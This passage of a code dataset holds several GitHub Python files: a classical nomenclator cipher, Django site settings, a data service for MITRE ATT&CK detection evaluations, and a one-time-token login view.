50:\n break\n \n for n,d in enumerate(ngrams3):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n if n > 40:\n break\n \n for n,d in enumerate(ngrams4):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n if n > 30:\n break\n \n # Get the raw numbers into something more manageable. This is basically\n # arbitrary and could be done in a lot of ways.\n normalizingFactor = min(codeDict.values())//3\n for i in codeDict.items():\n codeDict[i[0]] = int(np.ceil(np.sqrt(i[1]//normalizingFactor)))\n # Put the supernulls and ordinary nulls into the list\n codeDict[\">\"] = 30\n codeDict[\"_\"] = 63\n\n\n # When encoding we go through the dictionary and replace the number N with\n # the next N code groups in the sorted list.\n # This way we can quickly lookup a sequence of symbols and find all the\n # codegroups that are used for it.\n if decode == False:\n for i in codeDict.items():\n L = []\n for j in range(i[1]):\n L.append(codegroups.pop())\n codeDict[i[0]] = L\n return codeDict\n \n # When decoding we make a new dictionary and for each item in the code\n # dictionary make N new entries from the sorted code groups.\n # This way we can quickly lookup a codegroup and get what it decodes as.\n if decode == True:\n decodeDict = {}\n for i in codeDict.items():\n for j in range(i[1]):\n decodeDict[codegroups.pop()] = i[0]\n return decodeDict\n \n\n\ndef nomenclator(text,key=1,decode=False,usenulls=True,dictionary=False,showgroups=False):\n \n D = createCodeGroups(key,decode)\n if dictionary == True:\n return D\n\n \n if decode == False:\n codegroups = [\"{0:03} \".format(i) for i in range(1000)]\n \n if usenulls == True:\n\n numNulls = len(text)//25\n\n ## Insert nulls to break up words\n for i in range(numNulls):\n r = random.randint(0,len(text))\n text = text[:r] + '_' + text[r:]\n \n for i in range(numNulls//3):\n r = random.randint(0,len(text))\n text = text[:r] + '>' + text[r:]\n \n # Replace the nulls\n while \"_\" in text:\n text = text.replace(\"_\",D[\"_\"][np.random.randint(0,63)],1)\n \n while \">\" in text:\n gr = random.choice(codegroups)\n text = text.replace(\">\",D[\">\"][np.random.randint(0,30)]+gr,1)\n \n # Starting with the longer ngrams replace \n for d in [i for i in D.keys() if len(i) == 4]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n\n for d in [i for i in D.keys() if len(i) == 3]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n \n for d in [i for i in D.keys() if len(i) == 2]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n \n for d in [i for i in D.keys() if len(i) == 1]:\n T = d.split(\",\")[0]\n ops = len(D[T]) \n while T in text:\n text = text.replace(T,D[T][np.random.randint(0,ops)],1)\n \n \n return text\n \n if decode == True:\n X = text.split(\" \")\n X.pop()\n\n for pos,gr in enumerate(X):\n X[pos] = D[gr+\" \"]\n\n # Mainly for debugging but also illustrative if you want to see how a\n # given text translates directly into code groups.\n if showgroups == True:\n return X\n\n while \">\" in X:\n pos = X.index(\">\")\n X[pos:pos+2] = \"\"\n\n while \"_\" in X:\n pos = X.index(\"_\")\n X[pos] = \"\"\n\n \n return \"\".join(X)\n\n\ndef nomenclatorExample():\n \n from Ciphers.UtilityFunctions import preptext\n\n print(\"Example of the Nomenclator Cipher\")\n\n textfile = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\SampleText\\\\Text2.txt','r')\n ptext = preptext(textfile.readline(),silent=True)\n ptext = ptext[:200]\n \n #KEY = random.getrandbits(32)\n KEY = 3664080377\n \n ctext = nomenclator(ptext,KEY)\n dtext = nomenclator(ctext,KEY,decode=True)\n \n print(\"Plaintext is:\\n{}\\n\\n\".format(ptext))\n print(\"Ciphertext is:\\n{}\".format(ctext))\n\n print(\"\\n\\nDoes the Text Decode Correctly?\",dtext == ptext)\n\ndef PrintCodes(n,decode=False):\n \n D = createCodeGroups(n,decode=decode)\n \n if decode == False:\n for i,j in sorted(D.items()):\n if i in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" and len(i) == 1:\n S = i + \": \"\n for ctr,grp in enumerate(j,1):\n S += grp\n if ctr % 7 == 0 and grp != j[-1]:\n S += \"\\n \"\n yield S\n \n for L in [2,3,4]:\n for i,j in sorted(D.items()):\n if len(i) == L:\n S = i + \": \"\n for ctr,grp in enumerate(j,1):\n S += grp\n if ctr % 7 == 0 and grp != j[-1]:\n S += \"\\n \" + \" \"*(L-1)\n yield S\n \n S = \"_: \"\n for ctr,grp in enumerate(D[\"_\"],1):\n S += grp\n if ctr % 7 == 0 and grp != j[-1]:\n S += \"\\n \"\n yield S\n \n S = \">: \"\n for ctr,grp in enumerate(D[\">\"],1):\n S += grp\n if ctr % 7 == 0 and grp != j[-1]:\n S += \"\\n \"\n yield S\n \n if decode == True:\n ctr = 0\n S = \"\"\n for i,j in sorted(D.items()):\n if ctr % 3 == 0 and ctr != 0: \n yield S\n S = \"\"\n S += \"{}{:<4} \".format(i,j)\n ctr += 1\n\n#nomenclatorExample()\n#for i in PrintCodes(1,decode=True):\n# print(i)\n","repo_name":"SymmetricChaos/ClassicCrypto","sub_path":"Ciphers/Nomenclator.py","file_name":"Nomenclator.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"12406694541","text":"# Check this into the repo now\n\n#: Google Analytics tracking code\nGA_CODE = 'UA-19123154-19'\n#: Typekit font code, from the embed URL: http://use.typekit.com/(code).js\nTYPEKIT_CODE = 'wxg4owb'\n#: Timezone for displayed datetimes\nTIMEZONE = 'Asia/Calcutta'\n#: Site id for networkbar\nSITE_ID = 'events'\n#: LastUser server\nLASTUSER_SERVER = 'https://auth.hasgeek.com/'\n#: LastUser client id\n#: DO NOT FILL IN THIS VALUE! THIS FILE IS CHECKED INTO GIT\n#: Put the value in development.py or production.py instead\nLASTUSER_CLIENT_ID = ''\n#: LastUser client secret\n#: DO NOT FILL IN THIS VALUE! THIS FILE IS CHECKED INTO GIT\n#: Put the value in development.py or production.py instead\nLASTUSER_CLIENT_SECRET = ''\n","repo_name":"hasgeek/fifthelephant","sub_path":"instance/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"7526380951","text":"import copy\nimport os\nimport ntpath\nfrom pandas import json_normalize\nfrom app.utility.base_svc import BaseService\n\n\nclass DataService(BaseService):\n adversary_path = os.path.abspath('data/evaluations/')\n procedures_path = os.path.abspath('data/procedures/')\n apt29_categories = ['None', 'Telemetry', 'MSSP', 'General', 'Tactic', 'Technique', 'N/A']\n apt29_modifiers = {\"None\", \"Alert\", \"Correlated\", \"Delayed (Manual)\", \"Delayed (Processing)\", \"Host Interrogation\",\n \"Residual Artifact\",\n \"Configuration Change (Detections)\",\n \"Configuration Change (UX)\", \"Innovative\"}\n\n mod_organized = {'datasets': {\"None\": [], \"Alert\": [], \"Correlated\": [],\n \"Delayed (Manual)\": [], \"Delayed (Processing)\": [], \"Host Interrogation\": [],\n \"Residual Artifact\": [], \"Configuration Change (Detections)\": [],\n \"Configuration Change (UX)\": [], \"Innovative\": []}, 'labels': []}\n organized = {'datasets': {'None': [], 'Telemetry': [], 'General': [], 'Tactic': [], 'Technique': [], 'MSSP': [], 'N/A': []},\n 'labels': []}\n\n def __init__(self):\n self.log = self.add_service('data_svc', self)\n self.schema = dict(procedures=[], evaluations={})\n self.ram = copy.deepcopy(self.schema)\n\n async def load_evaluations(self):\n evaluations = await self.get_service('file_svc').get_json_files(self.adversary_path)\n for evaluation in evaluations:\n results = await self.get_service('file_svc').load_json_file(evaluation)\n name = ntpath.basename(evaluation).rstrip('.json')\n data = await self.analyze_evaluations(results, name)\n self.ram['evaluations'].update({name: {'data': data, 'results': results}})\n\n async def load_procedures(self):\n procedures = await self.get_service('file_svc').get_json_files(self.procedures_path)\n for procedure in procedures:\n data = await self.get_service('file_svc').load_json_file(procedure)\n name = ntpath.basename(procedure)\n self.ram['procedures'].append({name: data})\n\n async def get_evaluations(self):\n return self.ram.get('evaluations')\n\n async def get_procedures(self):\n return self.ram.get('procedures')\n\n async def get_evaluations(self, criteria):\n evaluations = list(self.ram['evaluations'].keys())\n evaluations = [(eval_id, eval_id.split('.')[0]) for eval_id in evaluations if criteria['round'] in eval_id]\n return sorted(evaluations)\n\n async def analyze_evaluations(self, results, eval_name):\n detections = 'DetectionCategories' if 'apt3' in eval_name else 'Detections'\n tmp = json_normalize(data=results['Techniques'],\n record_path=['Steps', detections],\n meta=['TechniqueId', 'TechniqueName', 'Tactics', ['Steps', 'SubStep']])\n\n tmp['Tactic'] = tmp.apply(lambda r: r.Tactics[0]['TacticName'], axis=1)\n mod_df = tmp.explode('Modifiers')\n mod_df['Step'] = mod_df.apply(lambda row: row['Steps.SubStep'].split('.', 1)[0], axis=1)\n modifier_detections = mod_df.groupby(['DetectionType', 'Modifiers']).size().to_dict()\n data = dict(modifier_detections=await self.consolidate(modifier_detections))\n data['technique'] = await self.consolidate(mod_df.groupby(['TechniqueName', 'DetectionType']).size().to_dict())\n data['total'] = tmp.groupby('DetectionType').count()['DetectionNote'].to_dict()\n data['technique_mod'] = await self.consolidate(mod_df.groupby(['TechniqueName', 'Modifiers']).size().to_dict())\n data['substep'] = await self.consolidate(mod_df.groupby(['Steps.SubStep', 'DetectionType']).size().to_dict())\n data['step'] = await self.consolidate(mod_df.groupby(['Step', 'DetectionType']).size().to_dict())\n data['tactic'] = await self.consolidate(mod_df.groupby(['Tactic', 'DetectionType']).size().to_dict())\n data['tactic_steps'] = await self.consolidate(mod_df.groupby(['Tactic', 'Step', 'DetectionType']).size().to_dict())\n data['step_modifiers'] = await self.consolidate(\n mod_df.groupby(['Step', 'Modifiers']).size().to_dict())\n return data\n\n async def get_data(self, criteria):\n eval_name = criteria['eval']\n if 'category' in criteria.keys():\n return self.ram['evaluations'][eval_name]['data'][criteria['data']][criteria['category']]\n else:\n return self.ram['evaluations'][eval_name]['data'][criteria['data']]\n\n @staticmethod\n async def consolidate(expanded_data):\n data = {}\n for tp, val in expanded_data.items():\n if tp[0] in data.keys():\n data[tp[0]].update({tp[1]: val})\n else:\n data.update({tp[0]: {tp[1]: val}})\n return data\n\n async def step_data(self, criteria):\n eval_name = criteria['eval']\n data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n tmp_org = copy.deepcopy(self.organized)\n for key in range(1, 21):\n key = str(key)\n tmp_org['labels'].append(key)\n for cat in self.apt29_categories:\n if cat not in data[key].keys():\n tmp_org['datasets'][cat].append(0)\n else:\n tmp_org['datasets'][cat].append(data[key][cat])\n return tmp_org\n\n async def substep_data(self, criteria):\n eval_name = criteria['eval']\n data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n tmp_org = copy.deepcopy(self.organized)\n tmp = sorted(data.items(), key=lambda k: int(k[0].split('.')[0]))\n for key in tmp:\n tmp_org['labels'].append(key[0])\n for cat in self.apt29_categories:\n if cat not in data[key[0]].keys():\n tmp_org['datasets'][cat].append(0)\n else:\n tmp_org['datasets'][cat].append(data[key[0]][cat])\n return tmp_org\n\n async def modifier_data(self, criteria):\n eval_name = criteria['eval']\n data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n tmp_org = copy.deepcopy(self.organized)\n del tmp_org['datasets']['N/A']\n apt29_cat = copy.deepcopy(self.apt29_categories)\n for key in apt29_cat[:6]:\n if key in data.keys():\n for mod in self.apt29_modifiers:\n if mod not in data[key].keys():\n tmp_org['datasets'][key].append(0)\n else:\n tmp_org['datasets'][key].append(data[key][mod])\n else:\n for mod in self.apt29_modifiers:\n tmp_org['datasets'][key].append(0)\n return tmp_org\n\n async def tactic_data(self, criteria):\n eval_name = criteria['eval']\n data = self.ram['evaluations'][eval_name]['data'][criteria['data']]\n return data\n\n\n\n\n","repo_name":"mitre-attack/joystick","sub_path":"app/service/data_svc.py","file_name":"data_svc.py","file_ext":"py","file_size_in_byte":7061,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"19"} +{"seq_id":"37092429281","text":"import json\n\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect, HttpResponseNotFound\nfrom django.shortcuts import get_object_or_404, resolve_url\nfrom django.utils.http import is_safe_url\nfrom django.views.generic import View\n\nfrom django.contrib.auth import authenticate, login\n\nfrom .models import LOT\n\n\nclass LOTLogin(View):\n def get(self, request, uuid):\n lot = get_object_or_404(LOT, uuid=uuid)\n if not lot.verify():\n lot.delete()\n return HttpResponseNotFound()\n\n user = authenticate(lot_uuid=uuid)\n login(request, user)\n\n try:\n session_data = json.loads(lot.session_data)\n request.session.update(session_data)\n except Exception:\n # If not correctly serialized not set the session_data\n pass\n\n if lot.is_one_time():\n lot.delete()\n\n redirect_to = request.GET.get('next')\n if lot.next_url:\n redirect_to = resolve_url(lot.next_url)\n\n if not is_safe_url(url=redirect_to, host=request.get_host()):\n redirect_to = resolve_url(settings.LOGIN_REDIRECT_URL)\n\n return HttpResponseRedirect(redirect_to)\n","repo_name":"jespino/django-lot","sub_path":"lot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"}